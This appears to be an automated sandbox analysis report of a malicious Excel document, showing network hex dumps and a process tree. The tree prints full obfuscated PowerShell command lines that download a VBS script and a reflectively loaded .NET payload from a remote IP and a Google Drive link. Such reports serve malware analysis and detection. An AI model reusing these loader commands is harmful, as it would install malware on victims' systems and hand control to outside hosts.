                                                                                                  2024-10-30 07:05:00 UTC1326INData Raw: e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db
                                                                                                  Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                                  Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                                  Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                                  Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                                  Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                                  Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                                  Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                                  2024-10-30 07:05:00 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                                  Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:03:03:59
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                  Imagebase:0x13ff60000
                                                                                                  File size:28'253'536 bytes
                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:03:04:22
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                  Imagebase:0x13f760000
                                                                                                  File size:13'824 bytes
                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:03:04:26
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:03:04:28
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:03:04:30
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline"
                                                                                                  Imagebase:0x13f4c0000
                                                                                                  File size:2'758'280 bytes
                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:03:04:30
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7224.tmp" "c:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP"
                                                                                                  Imagebase:0x13f750000
                                                                                                  File size:52'744 bytes
                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:03:04:35
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
                                                                                                  Imagebase:0xff4b0000
                                                                                                  File size:168'960 bytes
                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:03:04:36
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:03:04:37
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:03:04:41
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                  Imagebase:0x13faf0000
                                                                                                  File size:13'824 bytes
                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:03:04:44
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; 